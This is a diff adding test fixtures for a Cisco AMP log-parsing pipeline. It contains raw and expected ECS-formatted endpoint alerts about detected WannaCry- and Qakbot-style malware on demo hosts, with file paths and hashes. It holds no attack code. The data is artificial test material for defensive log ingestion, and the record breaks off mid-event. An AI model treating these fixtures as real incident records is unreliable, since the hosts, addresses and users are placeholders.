+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":377000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064596","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
\ No newline at end of file
diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp4.ndjson.log-expected.json b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp4.ndjson.log-expected.json
new file mode 100644
index 00000000000..26bab6555f6
--- /dev/null
+++ b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp4.ndjson.log-expected.json
@@ -0,0 +1,8107 @@
+{
+    "expected": [
+        {
+            "@timestamp": "2021-01-14T21:17:16.000Z",
+            "file": {
+                "name": "resume.exe",
+                "path": "\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe",
+                "hash": {
+                    "sha1": "5ca4bef8de6def53519d4b22632675bb4c1e470b",
+                    "sha256": "6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86",
+                    "md5": "41476df3138717868118d8542cf3d1d6"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_AMP"
+                ],
+                "hash": [
+                    "6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86",
+                    "41476df3138717868118d8542cf3d1d6",
+                    "5ca4bef8de6def53519d4b22632675bb4c1e470b"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "name": "Demo_AMP",
+                "hostname": "Demo_AMP"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:31:29.843493642Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6508397899087348000,\"timestamp\":1610659036,\"timestamp_nanoseconds\":295927133,\"date\":\"2021-01-14T21:17:16+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.6A37D750F0-100.SBX.TG\",\"detection_id\":\"6508397899087347713\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"resume.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Desktop\\\\resume.exe\",\"identity\":{\"sha256\":\"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86\",\"sha1\":\"5ca4bef8de6def53519d4b22632675bb4c1e470b\",\"md5\":\"41476df3138717868118d8542cf3d1d6\"}}}}",
+                "kind": "alert",
+                "action": "Retrospective Detection",
+                "id": "6508397899087348000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.6A37D750F0-100.SBX.TG",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "38:1e:eb:ba:2c:15",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "38:1e:eb:ba:2c:15"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6508397899087347713",
+                    "event_type_id": 553648147
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "hash": {
+                    "sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"
+                }
+            },
+            "@timestamp": "2021-01-14T20:38:26.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Qakbot_3"
+                ],
+                "hash": [
+                    "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Qakbot_3",
+                "hostname": "Demo_Qakbot_3"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:31:29.843500994Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":14930696955218,\"timestamp\":1610656706,\"timestamp_nanoseconds\":844899579,\"date\":\"2021-01-14T20:38:26+00:00\",\"event_type\":\"Executed malware\",\"event_type_id\":1107296272,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610656706,\"start_date\":\"2021-01-14T20:38:26+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}}",
+                "kind": "alert",
+                "start": "2021-01-14T20:38:26.000Z",
+                "action": "Executed malware",
+                "id": "14930696955218",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.E4FCCBFA69-95.SBX.TG",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "02:2f:e0:10:03:5d",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Malicious",
+                            "identity": {}
+                        },
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "02:2f:e0:10:03:5d"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 1107296272
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T20:18:05.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Qakbot_3"
+                ],
+                "hash": [
+                    "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Qakbot_3",
+                "hostname": "Demo_Qakbot_3"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843503140Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":587000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6412680266518626319\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6412680266518626000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "02:2f:e0:10:03:5d",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "02:2f:e0:10:03:5d"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Object name not found",
+                        "error_code": 3221225524
+                    },
+                    "detection_id": "6412680266518626319",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T20:18:05.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Qakbot_3"
+                ],
+                "hash": [
+                    "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Qakbot_3",
+                "hostname": "Demo_Qakbot_3"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843505081Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":494000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6412680266518626317\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6412680266518626000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "02:2f:e0:10:03:5d",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "02:2f:e0:10:03:5d"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Delete pending",
+                        "error_code": 3221225558
+                    },
+                    "detection_id": "6412680266518626317",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "name": "QuotaGroup.exe",
+                "pid": 7120,
+                "hash": {
+                    "sha1": "f504774b72acfb23a46217aec9c6559fd7e4df64",
+                    "sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014",
+                    "md5": "b5ede95ec8bc4ad6984758be42b152bd"
+                }
+            },
+            "@timestamp": "2021-01-14T20:18:05.000Z",
+            "file": {
+                "name": "28242311.exe",
+                "path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe",
+                "hash": {
+                    "sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_Qakbot_3"
+                ],
+                "hash": [
+                    "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Qakbot_3",
+                "hostname": "Demo_Qakbot_3",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843507024Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":587000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"detection_id\":\"6412680266518626319\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"28242311.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\28242311.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"},\"parent\":{\"process_id\":7120,\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\",\"sha1\":\"f504774b72acfb23a46217aec9c6559fd7e4df64\",\"md5\":\"b5ede95ec8bc4ad6984758be42b152bd\"}}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6412680266518626000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.E4FCCBFA69-95.SBX.TG",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "02:2f:e0:10:03:5d",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Malicious",
+                            "identity": {}
+                        },
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "02:2f:e0:10:03:5d"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6412680266518626319",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T20:18:05.000Z",
+            "file": {
+                "name": "QuotaGroup.exe",
+                "path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe",
+                "hash": {
+                    "sha1": "f504774b72acfb23a46217aec9c6559fd7e4df64",
+                    "sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014",
+                    "md5": "b5ede95ec8bc4ad6984758be42b152bd"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_Qakbot_3"
+                ],
+                "hash": [
+                    "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014",
+                    "b5ede95ec8bc4ad6984758be42b152bd",
+                    "f504774b72acfb23a46217aec9c6559fd7e4df64"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Qakbot_3",
+                "hostname": "Demo_Qakbot_3",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843508958Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":572000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"detection_id\":\"6412680266518626318\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\QuotaGroup\\\\QuotaGroup.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\",\"sha1\":\"f504774b72acfb23a46217aec9c6559fd7e4df64\",\"md5\":\"b5ede95ec8bc4ad6984758be42b152bd\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6412680266518626000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.E4FCCBFA69-95.SBX.TG",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "02:2f:e0:10:03:5d",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "02:2f:e0:10:03:5d"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6412680266518626318",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "name": "28242311.exe",
+                "pid": 4788,
+                "hash": {
+                    "sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"
+                }
+            },
+            "@timestamp": "2021-01-14T20:18:05.000Z",
+            "file": {
+                "name": "28242311.exe",
+                "path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe",
+                "hash": {
+                    "sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_Qakbot_3"
+                ],
+                "hash": [
+                    "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Qakbot_3",
+                "hostname": "Demo_Qakbot_3",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843510902Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":494000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"detection_id\":\"6412680266518626317\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"28242311.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\28242311.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"},\"parent\":{\"process_id\":4788,\"disposition\":\"Malicious\",\"file_name\":\"28242311.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6412680266518626000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.E4FCCBFA69-95.SBX.TG",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "02:2f:e0:10:03:5d",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Malicious",
+                            "identity": {}
+                        },
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "02:2f:e0:10:03:5d"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6412680266518626317",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T20:18:05.000Z",
+            "file": {
+                "name": "28242311.exe",
+                "path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe",
+                "hash": {
+                    "sha1": "f504774b72acfb23a46217aec9c6559fd7e4df64",
+                    "sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014",
+                    "md5": "b5ede95ec8bc4ad6984758be42b152bd"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_Qakbot_3"
+                ],
+                "hash": [
+                    "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014",
+                    "b5ede95ec8bc4ad6984758be42b152bd",
+                    "f504774b72acfb23a46217aec9c6559fd7e4df64"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Qakbot_3",
+                "hostname": "Demo_Qakbot_3",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843512823Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":478000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat 